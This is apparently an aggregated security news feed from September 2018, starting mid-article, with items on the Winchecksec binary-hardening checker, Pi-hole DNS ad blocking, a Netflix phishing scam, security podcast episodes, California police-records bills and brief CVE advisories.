The confusion comes from a new way in which Google shows your “logged in” status. Previously, if you were signed in to Chrome, an icon would appear in the upper right-hand corner, indicating that you were signed in and sharing data. The same icon now appears if you’re logged into a Google service like Google.com or Gmail, but not necessarily to Chrome. 

Update 9/26/18: Google has announced upcoming changes to the way Chrome 70 handles sign-ins to address this issue.


Effortless security feature detection with Winchecksec

We’re proud to announce the release of Winchecksec, a new open-source tool that detects security features in Windows binaries. Developed to satisfy our analysis and research needs, Winchecksec aims to surpass current open-source security feature detection tools in depth, accuracy, and performance without sacrificing simplicity.

Feature detection, made simple

Winchecksec takes a Windows PE binary as input, and outputs a report of the security features baked into it at build time. Common features include:

  • Address-space layout randomization (ASLR) and 64-bit-aware high-entropy ASLR (HEASLR)
  • Authenticity/integrity protections (Authenticode, Forced Integrity)
  • Data Execution Prevention (DEP), better known as W^X or No eXecute (NX)
  • Manifest isolation
  • Structured Exception Handling (SEH) and SafeSEH
  • Control Flow Guard (CFG) and Return Flow Guard (RFG)
  • Guard Stack (GS), better known as stack cookies or canaries

Winchecksec’s two output modes are controlled by one flag (-j): the default plain-text tabular mode for humans, and a JSON mode for machine consumption. In action:

[Screenshot: Winchecksec’s plain-text and JSON output]

Did you notice that Winchecksec distinguishes between “Dynamic Base” and ASLR above? This is because setting /DYNAMICBASE at build-time does not guarantee address-space randomization. Windows cannot perform ASLR without a relocation table, so binaries that explicitly request ASLR but lack relocation entries (indicated by IMAGE_FILE_RELOCS_STRIPPED in the image header’s flags) are silently loaded without randomized address spaces. This edge case was directly responsible for turning an otherwise moderate use-after-free in VLC 2.2.8 into a gaping hole (CVE-2017-17670). The underlying toolchain error in mingw-w64 remains unfixed.

Similarly, applications that run under the CLR are guaranteed to use ASLR and DEP, regardless of the state of the Dynamic Base/NX compatibility flags or the presence of a relocation table. As such, Winchecksec will report ASLR and DEP as enabled on any binary that indicates that it runs under the CLR. The CLR also provides safe exception handling but not via SafeSEH, so SafeSEH is not indicated unless enabled.

How do other tools compare?

Not well:

  • Microsoft released BinScope in 2014, only to let it wither on the vine. BinScope performs several security feature checks and provides XML and HTML outputs, but relies on .pdb files for its analysis of binaries. As such, it’s impractical for any use case outside the Microsoft Secure Development Lifecycle. BinSkim appears to be BinScope’s spiritual successor and is actively maintained, but uses an obtuse, overengineered format for machine consumption. Like BinScope, it also appears to depend on the availability of debugging information.
  • The Visual Studio toolchain provides dumpbin.exe, which can be used to dump some of the security attributes present in the given binary. But dumpbin.exe doesn’t provide a machine-consumable output, so developers are forced to write ad-hoc parsers. To make matters worse, dumpbin.exe provides a dump, not an analysis, of the given file. It won’t, for example, explain that a program with stripped relocation entries and Dynamic Base enabled isn’t ASLR-compatible. It’s up to the user to put two and two together.
  • NetSPI maintains PESecurity, a PowerShell script for testing many common PE security features. While it provides a CSV output option for programmatic consumption, its performance lags well behind dumpbin.exe and the other compiled tools mentioned here, let alone Winchecksec.
  • There are a few small feature detectors floating around the world of plugins and gists, like this one, this one, and this one (for x64dbg!). These are generally incomplete (in terms of checks), difficult to interact with programmatically, sporadically maintained, and/or perform ad-hoc PE parsing. Winchecksec aims for completeness in the domain of static checks, is maintained, and uses official Windows APIs for PE parsing.

Try it!

Winchecksec was developed as part of Sienna Locomotive, our integrated fuzzing and triaging system. As one of several triaging components, Winchecksec informs our exploitability scoring system (reducing the exploitability of a buffer overflow, for example, if both DEP and ASLR are enabled) and allows us to give users immediate advice on improving the baseline security of their applications. We expect that others will develop additional use cases, such as:

  • CI/CD integration to make a base set of security features mandatory for all builds (see the sketch after this list).
  • Auditing entire production servers for deployed applications that lack key security features.
  • Evaluating the efficacy of security features in applications (e.g., whether stack cookies are effective in a C++ application with a large number of buffers in objects that contain vtables).

Get Winchecksec on GitHub now. If you’re interested in helping us develop it, try out this crop of first issues.

Don’t Hit Me Up – Application Security Weekly #33

This week, Keith and special guest host April Wright interview Ron Gula, Founder of Tenable and Gula Tech Adventures! They discuss security in the upcoming elections, how to maintain separation of duties, attack simulation, and more! In the Application Security News, Hackers stole customer credit cards in Newegg data breach, John Hancock now requires monitoring bracelets to buy insurance, the man who broke Ticketmaster, new security settings available in iOS 12, State Department confirms data breach exposed employee data, and more!

 

Full Show Notes: https://wiki.securityweekly.com/ASW_Episode33

 

Visit https://www.securityweekly.com/asw for all the latest episodes!

 

Visit https://www.activecountermeasures.com/asw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Mmm… Pi-hole…

Presently sponsored by: Netsparker - a scalable and dead accurate web application security solution. Scan thousands of web applications within just hours.


I have a love-hate relationship with ad blockers. On the one hand, I despise the obnoxious ads that are forced down our throats at what seems like every turn. On the other hand, I appreciate the need for publishers to earn a living so that I can consume their hard-earned work for free. Somewhere in the middle is a responsible approach, for example the sponsorship banner you see at the top of this blog. Companies I choose to partner with get to appear there and they get themselves 140 characters and a link. That is all. No images. No video. No script. No HTML tags. No tracking. Sponsors are happy as they get exposure, visitors are happy because there's none of the aforementioned crap and I'm happy because it pays a lot better than ads ever did anyway. It almost seems like everyone is happy. Almost...

As I wrote about a couple of years ago, ad blockers aren't always happy and frankly, attitudes like that just make the whole ad problem even worse. That post attracted hundreds of comments ranging from "I don't mind ads" to "burn them all with fire and the consequences be damned". But it's not just the detrimental impact of blocking the very source of a website's revenue that worries me, it's also the fact that running an ad blocker means giving a third party an enormous amount of power over your browser. This creates a different risk to ads themselves - a much more serious one if it comes to fruition - and it looks like this:

That's actually my top tweet over the last 4 weeks by a significant margin because it's one we can all relate to. I certainly went back and revisited all the browser extensions I had installed and killed a few unnecessary ones. Bottom line is that you really want to consider how much you trust the organisation (or in many cases, the person) behind the extensions you run and even when you do, there's no guarantee it won't be backdoored MEGA.nz style.

Which brings me to Pi-hole. I'm going to keep the intro bits as brief as possible but, in a nutshell, Pi-hole is a little DNS server you run on a Raspberry Pi in your local network and then point your router at, so that every device in your home resolves DNS through the service. It then blacklists about 130k domains used for nasty stuff, so when any client on your network (PC, phone, smart TV) requests sleazy-ad-domain.com, the name simply doesn't resolve. Scott Helme put me onto this originally via his two excellent posts on Securing DNS across all of my devices with Pi-Hole + DNS-over-HTTPS + 1.1.1.1 and Catching and dealing with naughty devices on my home network. Go and read those because I'm deliberately not going to repeat them here. In fact, I hadn't even planned to write anything until I saw how much difference the service actually made. More on that in a moment; the one other bit I'll add here is that the Raspberry Pi I purchased for the setup was the Little Bird Raspberry Pi 3 Plus Complete Starter Kit:

[Image: Little Bird Raspberry Pi 3 Plus Complete Starter Kit]

This just made it a super easy turnkey solution. Plus, Little Bird Electronics down here in Aus delivered it really quickly and followed up with a personal email and a "thank you" for some of the other unrelated stuff I've been up to lately. Nice 🙂

I went with an absolute bare bones setup which essentially involved just following the instructions on the Pi-hole site (Scott gets a bit fancier in his blog posts). I had a bit of a drama due to some dependencies and after a quick tweet for help this morning followed by a question on Discourse, I was up and running. I set my Ubiquiti network to resolve DNS through the Pi and that's it - job done! As devices started picking up the new DNS settings, I got to see just how much difference was made. I set my desktop to manually resolve through Cloudflare's 1.1.1.1 whilst my laptop was using the Pi-hole which made for some awesome back to back testing. Here's what I found:

Let's take a popular local Aussie news site, news.com.au. Here's what it looks like with no Pi-hole:

[Screenshot: news.com.au without Pi-hole]

In the grand scheme of ads on sites, not too offensive. Let's look at it from the machine routing through the Pi-hole:

[Screenshot: news.com.au with Pi-hole]

Visually, there's not a whole lot of difference here. However, check out the network requests at the bottom of the browser before and after Pi-hole:

[Screenshot: network requests without Pi-hole]

[Screenshot: network requests with Pi-hole]

Whoa! That's an 80% reduction in network requests and an 82% reduction in the number of bytes transferred. I'd talk about the reduction in load time too except it's really hard to measure because as you can see from the waterfall diagrams, with no Pi-hole it just keeps going and going and, well, it all gets a bit silly.

Let's level it up because I reckon the smuttier the publication, the bigger the Pi-hole gain. Let's try these guys:

[Screenshot: dailymail.co.uk without Pi-hole]

And for comparison, when loaded with the Pi-hole in place:

[Screenshot: dailymail.co.uk with Pi-hole]

And now - (drum roll) - the network requests for each:

[Screenshot: network requests without Pi-hole]

[Screenshot: network requests with Pi-hole]

Holy shit! What - why?! I snapped the one without Pi-hole at 17.4 mins after I got sick of waiting. 2,663 requests (one of which was to Report URI, thank you very much!) and 57.6MB. To read the freakin' news. (Incidentally, in this image more than the others you can clearly see requests to domains such as fff.dailymail.co.uk failing as the Pi-hole prevents them from resolving.)

After just a few quick tests, I was pretty blown away by the speed difference. I only fired this up at about 8am this morning and I'm just 9 hours into it but already seeing some pretty cool stats:

[Screenshot: Pi-hole dashboard statistics after 9 hours]

It's also flagging a bunch of things I'd like to look at more, for example my wife's laptop being way chattier than everything else:

[Screenshots: Pi-hole query logs and per-client stats]

I haven't looked yet, but if anyone knows the purpose of that microsoft.com domain that continually gets Pi-holed, leave a comment below (I assume it's related to the native Windows 10 mail client). And yes, I'll chat to her about the Fox News situation as well!

I'm yet to have any legit functionality break because of the Pi-hole, but Scott has had to whitelist a couple of domains (literally 2, from memory) such as the Google Analytics dashboard. Of course, it's entirely feasible that legit stuff will break and I myself have gone through troubleshooting pains on behalf of other people before only to then realise that it was their modification of my site that caused the failure. That's always going to be a risk and frankly, that's on me if my choice of tooling breaks something.

So in summary, no compromising devices, no putting your trust in the goodwill of an extension developer, no per-device effort, the bad stuff is blocked and the good stuff still works:

[Screenshot: the bad stuff blocked, the good stuff still working]

Lastly, Pi-hole has a donate page and this is one of those cases where if you find it as awesome as I have already, you should absolutely show them some love. Cash in some of that time you've reclaimed by not waiting for rubbish ads to load 😎

SN 682: SNI Encryption

This week we look at additional changes coming from Google's Chromium team, another powerful instance of newer cross-platform malware, the publication of a 0-day exploit after Microsoft missed its deadline, the return of Sabri Haddouche with browser crash attacks, the reasoning behind Matthew Green's decision to abandon Chrome after a change in release 69... and an "UnGoogled" Chromium alternative that Matthew might approve of, Western Digital's pathetic response to a very serious vulnerability, a cool device exploit collection website, a question about the future of the Internet, a sobering example of the aftermarket in unwiped hard drives, the Mirai Botnet creators are now working with and helping the FBI, another fine levied against Equifax, and a look at Cloudflare's quick move to encrypt a remaining piece of web metadata.

We invite you to read our show notes.

Hosts: Steve Gibson and Leo Laporte

Download or subscribe to this show at https://twit.tv/shows/security-now.

You can submit a question to Security Now! at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written, SpinRite 6.


Risky Business #515 — NSA staffer at centre of Kaspersky scandal jailed

This edition of the show features Adam Boileau and Patrick Gray discussing the week’s security news:

  • Former NSA staffer gets 66 months over incident at heart of Kaspersky scandal
  • Zoho has a very bad week
  • Telco lobby group raises some legit concerns over Australia’s “anti-encryption” legislation
  • Twitter API leaks DMs
  • Equifax fined by UK
  • Yubikey 5 enables passwordless Windows logins
  • Privacy International has an aneurism
  • NSS Labs launches antitrust suit against security software makers
  • MOAR

This week’s show is brought to you by Rapid7.

Jen Andre is this week’s sponsor guest. She founded Komand, a security automation and orchestration company that became part of Rapid7 around the middle of last year. I spoke to Jen a bit about how she came to start Komand and where the security automation and orchestration discipline is at right now.

Links to everything that we discussed are below, including the discussions that were edited out. (That’s why there are extras.) You can follow Patrick or Adam on Twitter if that’s your thing.

Show notes

Ex-NSA employee gets 5.5 years in prison for taking home classified info | ZDNet
Domain registrar oversteps taking down Zoho domain, impacts over 30Mil users | ZDNet
Peter Dutton to push through new security legislation as fears of "severely damaging" spyware murmur
Twitter API bug leaked private data to other accounts
Equifax fined maximum penalty under 1998 UK data protection law
The Series 5 YubiKey Will Help Kill the Password | WIRED
Press release: UK intelligence agency admits unlawfully spying on Privacy International | Privacy International
UK spooks fess up to snooping on Privacy International's private data
GCHQ's mass surveillance violates citizens' right to privacy, ECHR rules
NSS Labs files antitrust suit against multiple cybersecurity vendors
Hacking for ca$h | The Strategist
Operator of 'VirusTotal for criminals' gets 14-year prison sentence
Tencent engineer attending cybersecurity event fined for hotel WiFi hacking
Snyk gets $22 million for platform that tracks security flaws in open source projects
They Got 'Everything': Inside a Demo of NSO Group's Powerful iPhone Malware - Motherboard
Content Moderator Sues Facebook, Says Job Gave Her PTSD - Motherboard
Microsoft Rolls Out Confidential Computing for Azure
Cloudflare Improves Privacy by Encrypting the SNI During TLS Negotiation
This Windows file may be secretly hoarding your passwords and emails | ZDNet
Security researcher claims macOS Mojave privacy bug on launch day | TechCrunch
0Day Windows JET Database Vulnerability disclosed by Zero Day Initiative
Over 80 Cisco Products Affected by FragmentSmack DoS Bug
Cisco patches 'critical' credential bug in video surveillance software
Security Orchestration and Automation with InsightConnect | Rapid7
Security Orchestration and Automation for Security Operations | Rapid7

NBlog Sept 26 – what is security architecture?


A newcomer to the ISO27k Forum asked one of those disarmingly simple or naive-sounding questions today, the kind that turn out to be fascinating once we scratch beneath the surface.

"I am currently assigned task to perform security architecture review. Can anyone help me with reference links to start off with?"


It would be inappropriate to offer suggestions and press ahead without first understanding the objectives, expectations and constraints, hence the obvious starting point (from my perspective) would be to figure out what a “security architecture review” is - more specifically, what management (or whoever assigned the task) expects from it e.g.:
  • What are its aims/purposes or drivers? 
  • Where did it spring from? What triggered it? Why now? Why you?
  • Is it business-led or IT or infosec or risk or what? Who is behind it? Who stands to benefit or be affected by it? Who are the stakeholders? Are they supportive and engaged, neutral/unaware, or reluctant and disengaged?
  • What is it expected to lead into – if anything? Is the outcome entirely open at this point, depending on what the review finds, or are there pencil marks or proposals on the table already, perhaps secret agendas looking for fuses to light?
  • What is the scope? Is it meant to be reviewing all of 'security' (whatever that means), or information security, or cybersecurity, or compliance, or strategy, or assurance, or software development security, or information flows, or something else? And why is that - what determines the scope? Why are some things in and others out of scope?
  • And, not least, what is ‘security architecture’, or indeed ‘architecture’, in the specific context of the organization? In some organizations, architecture is central to strategy, making it the domain of senior, experienced managers, who are unlikely to task a clueless underling with reviewing it. In others, it's about blueprints (literally) showing plan and elevation views, and Crime Prevention Through Environmental Design.
These are not facetious or trivial questions: to my mind, there are lots of possibilities which affect the review substantially - such as its priorities, depth, scope, timescale, assurance and so on. It's basic navigation really:

Before plotting the route, where are we
on the map ... oh and where are we heading? 

For example, a "gap analysis" comparison of the organization’s information risk and security management practices against the recommendations in ISO/IEC27001 and 27002, is one possible approach. But that may not be what the organization is expecting from its "security architecture review" ... and that's not the only interpretation of "gap analysis"!

Another possible approach would be a strategic/high-level review of the organization’s information risk management practices and/or its suite of information security controls, with a strong emphasis on how things are or should develop over the next few years. Are there suitable foundations on which to build a solid ISMS with all the appropriate controls and other risk treatments in place? If not, what are the gaps and how might they be filled-in? Are there, for example, any other business, change, IT or other strategic initiatives on the horizon that might be opportunities to deliver substantial parts of the ISMS, with strong business backing and hopefully the funding to suit?

Yet another possibility is an audit/review of the organization’s current ‘security architecture’, a chance to determine how effective it is and has been, historically, forming the basis for revision, renewed emphasis or simply endorsement going forward. Is the organization poised to align its security arrangements with business objectives, technology trajectories and so forth? 

Those are substantially different approaches, just for starters, based on the forum question. We're some way from answering it at this point!

Netflix Users: Don’t Get Hooked by This Tricky Phishing Email

If you own a smart TV, or even just a computer, it’s likely you have a Netflix account. The streaming service is huge these days – even taking home awards for its own content. So it’s only natural that cybercriminals are attempting to leverage the service’s popularity for their own gain. In fact, fake Netflix emails discovered just last week have been circulating, claiming there are issues with users’ accounts. But of course, there is no issue at all – only a phishing scam underway.

The headline itself should be the first indicator of fraud, as it reads “Update your payment information!” The body of the fake email then claims that there’s an issue with the user’s account or that the account has been suspended, and states that they need to update their account details in order to resolve the problem. The link actually leads victims to a genuine-looking Netflix website designed to steal usernames and passwords, as well as payment details. If the victim updates their financial information, they are then taken to the real Netflix home page, which gives the trick a sense of legitimacy.

In short – this phishing email scheme is convincing and tricky. That means it’s crucial that all Netflix users take proactive steps now to protect themselves from this stealthy attack. To do just that, follow these tips:

  • Be careful what you click on. Only click on emails that you’re confident came from a trusted source. If you don’t know the sender, or the email’s content doesn’t seem familiar, remain wary and avoid interacting with the message.
  • Go directly to the source. It’s a good security rule of thumb: when an email comes through requesting personal info, always go directly to the company’s website to be sure you’re working with the real deal. You should be able to check your account status on the Netflix website and determine the legitimacy of the request from there. If anything is still in question, feel free to call Netflix’s support line and ask about the notice that way as well.
  • Place a fraud alert. If you know your financial data has been compromised by this attack, be sure to place a fraud alert on your credit so that any new or recent requests undergo scrutiny. It’s important to note that this also entitles you to extra copies of your credit report so you can check for anything sketchy. And if you find an account you did not open, make sure you report it to the police or Federal Trade Commission, as well as the creditor involved so you can put an end to the fraudulent account.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.



The post Netflix Users: Don’t Get Hooked by This Tricky Phishing Email appeared first on McAfee Blogs.

CVE-2018-14634 (enterprise_linux_desktop, enterprise_linux_server, enterprise_linux_server_aus, enterprise_linux_server_eus, enterprise_linux_server_tus, enterprise_linux_workstation, linux_kernel, ubuntu_linux)

An integer overflow flaw was found in the Linux kernel's create_elf_tables() function. An unprivileged local user with access to a SUID (or otherwise privileged) binary could use this flaw to escalate their privileges on the system. Kernel versions 2.6.x, 3.10.x and 4.14.x are believed to be vulnerable.

Hack Naked News #190 – September 25, 2018

This week, WordPress sites backdoored with malicious code, Google's forced sign-in to Chrome raises red flags, Newegg is victimized by Magecart malware, a woman hijacked CCTV cameras for Trump's inauguration, Bitcoin DDoS attacks, cybercriminals target Kodi for malware, and a security researcher is fined for hacking hotel Wi-Fi. Jason Wood joins us for expert commentary on Google Chrome's "dark pattern" of poor privacy changes, on this episode of Hack Naked News!

 

Full Show Notes: https://wiki.securityweekly.com/HNNEpisode190

 

Visit https://www.securityweekly.com/hnn for all the latest episodes!

Visit https://www.activecountermeasures.com/hnn to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Understanding Your Kid’s Smart Gadgets

When people think about IoT devices, many often think of those that fill their homes: smart lights, ovens, TVs, and the like. But there’s a whole other class of IoT devices inside the home that parents may not be as cognizant of – children’s toys. In 2018, smartwatches, smart teddy bears, and more are all in kids’ hands. And though parents are happy to purchase the next hot item for their children, they sometimes aren’t fully aware of how these devices can impact their child’s personal security. IoT has expanded to children, and it’s parents who need to understand how these toys affect their family and what they can do to keep their children protected from an IoT-based cyberthreat.

Now, add IoT into the mix. People are adopting IoT devices for one reason – convenience – and that’s the same reason these devices have made their way into children’s hands. They’re convenient, engaging, easy-to-use toys, some of which even help educate kids.

But this adoption has changed children’s online security. Now, instead of just limiting their device usage and screen time, parents have to start thinking about the types of threats that can emerge from their child’s interaction with IoT devices. For example, smartwatches have been used to track and record kids’ physical location. And children’s data is often recorded by these devices, which means it could potentially be leveraged for malicious purposes if a cybercriminal breaches the organization behind a specific connected product or app. The FBI has even previously cautioned that these smart toys can be compromised by hackers.

Keeping connected kids safe  

Fortunately, there are many things parents can do to keep their connected kids safe. First off, do the homework. Before buying any connected toy or device for a kid, parents should look up the manufacturer first and see if they have security top of mind. If the device has had any issues with security in the past, it’s best to avoid purchasing it. Additionally, always read the fine print. Terms and conditions should outline how and when a company accesses a kid’s data. When buying a connected device or signing them up for an online service/app, always read the terms and conditions carefully in order to remain fully aware of the extent and impact of a kid’s online presence and use of connected devices.

Mind you, these IoT toys must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose a family’s home network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level. Also, parents can keep an eye on their kid’s online interactions by leveraging a parental control solution like McAfee Safe Family. They can know what their kids are up to, guard them from harm, and limit their screen time by setting rules and time limits for apps and websites.

To learn more about IoT devices and how your children use them, be sure to follow us at @McAfee and @McAfee_Home.

The post Understanding Your Kid’s Smart Gadgets appeared first on McAfee Blogs.

Double Shot – Business Security Weekly #100

This week, Michael is joined by April Wright to interview Scott King, Sr. Director of Strategic Advisory Services at Rapid 7! In this two part interview, Michael and April talk with Scott about transitioning into his role at Rapid7, ICS Security, the best practices to understand how these systems work, holding accountability, and how legal and security share common goals!

Full Show Notes: https://wiki.securityweekly.com/BSWEpisode100

 

Visit https://www.securityweekly.com/bsw for all the latest episodes!

 

Visit https://www.activecountermeasures.com/bsw to sign up for a demo or buy our AI Hunter!

 

→Visit our website: https://www.securityweekly.com

→Follow us on Twitter: https://www.twitter.com/securityweekly

→Like us on Facebook: https://www.facebook.com/secweekly

Space Elevator Test

[Image: STARS space elevator]
So cool!

STARS-Me (or Space Tethered Autonomous Robotic Satellite – Mini elevator), built by engineers at Shizuoka University in Japan, consists of two 10-centimeter cubic satellites connected by a 10-meter-long tether. A small robot representing an elevator car, about 3 centimeters across and 6 centimeters tall, will move up and down the cable using a motor as the experiment floats in space.

Via Science News, “Japan has launched a miniature space elevator,” and “the STARS project.”

California transparency legislation could improve access to police records for journalists and the public

[Photo: Wikimedia Commons]

In November 2014, James De La Rosa was shot and killed by Bakersfield police officers. He was unarmed and 22 years old. Following his death, his family desperately wanted answers. But in California, police misconduct records are generally not available to the public—limiting what the De La Rosa family was able to learn about the officers who killed James.

“One of the officers who was involved in James’s shooting has reportedly also been involved in seven other shootings, while another officer has reportedly been involved in another killing,” James De La Rosa’s mother Leticia said in a statement to the ACLU. “Yet state law shields their records and families like mine rarely get answers to the questions we ask. All we get is secrecy.”

Like Leticia De La Rosa, Theresa Smith had a son killed by California police officers. Caesar Cruz was shot in a Walmart parking lot—allegedly multiple times—by Anaheim police officers before dying in a hospital a half hour later. An attorney for Cruz’ family called his death a “police execution.”

But all that Smith was allowed to know about her son’s death was that five officers were involved, and it took her over a year and a half to determine the name of the officer who killed Caesar Cruz.

While police misconduct information is public record in many states, that’s not the case in California. Even when an officer is repeatedly accused of or disciplined for abuse, these records are considered part of an officer’s personnel file.

In the 1970s, Gov. Jerry Brown signed into law a measure that blocked public access to misconduct documents, and forced defendants to petition a judge to examine these records in private and decide if the information warranted disclosure. In 2006, the California Supreme Court ruled that police misconduct investigations are confidential, a ruling that has kept answers from families of people hurt by police violence, obscured critical information about public officials from journalists, and shielded police from scrutiny.

Leticia De La Rosa and Theresa Smith are both advocates for a California bill that could make police investigation and disciplinary records available to the public in particularly egregious instances of misconduct.

“This bill would require, notwithstanding any other law, certain peace officer or custodial officer personnel records and records relating to specified incidents, complaints, and investigations involving peace officers and custodial officers to be made available for public inspection pursuant to the California Public Records Act,” reads California State Senate Bill 1421.

If SB 1421, sponsored by Sen. Nancy Skinner (D-Berkeley), becomes law, personnel records could be released to the public. Journalists would more easily be able to access information about incidents in which officers shoot or kill someone, commit perjury, lie in an investigation, commit sexual assault, or seriously injure a citizen.

Some police labor unions have fought the bill fiercely. The California Sheriffs Association argued that the bill could jeopardize officer privacy and create a financial burden on local agencies. Los Angeles Times journalist Liam Dillon noted that the Los Angeles Police Protective League gave the maximum contribution allowable to a dozen Assembly Democrats as they considered the bill.

Despite opposition from police unions, Nikki Moore, legal and legislative counsel at the California News Publishers Association, noted that the California Police Chiefs Association came out in support of the bill. “When they fire an officer and have evidence of misconduct, they can’t tell the public. They saw value in this transparency, and it’s a new perspective.”

SB 1421 has made it to the governor’s desk. It isn’t the only bill awaiting Jerry Brown’s signature that could improve access to police records. Assembly Bill 748 would require police departments to make body camera footage of most officer shootings and serious uses of force publicly available.

In a blog post, California Public Records Act attorney Anna von Herrmann wrote that the bill would open up critical access to records about egregious officer misconduct. “Given the enormous power that law enforcement agencies wield, from the power to arrest and detain individuals to the power to use lethal force, public access to this information could be a powerful tool to understanding and challenging law enforcement abuses.”

The impacts of both bills for transparency could be huge—for families like Cruz’ and De La Rosa’s, community organizers, and journalists reporting on police violence and abuse of power.

“Access to government records is a fundamental principle of democracy,” said Moore. “California, for so long, has denied access to these records, retaining complete discretion over disclosure. You have government agencies acting as editor.”

SB 1421 and AB 748 both await Governor Jerry Brown’s signature. He should sign them both.

CVE-2018-1664 (datapower_gateway)

IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8, as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2, echo AMP management interface authorization headers, exposing login credentials in the browser cache. IBM X-Force ID: 144890.

CVE-2018-1669 (datapower_gateway)

IBM DataPower Gateway 7.1.0.0 - 7.1.0.23, 7.2.0.0 - 7.2.0.21, 7.5.0.0 - 7.5.0.16, 7.5.1.0 - 7.5.1.15, 7.5.2.0 - 7.5.2.15, and 7.6.0.0 - 7.6.0.8 as well as IBM DataPower Gateway CD 7.7.0.0 - 7.7.1.2 are vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 144950.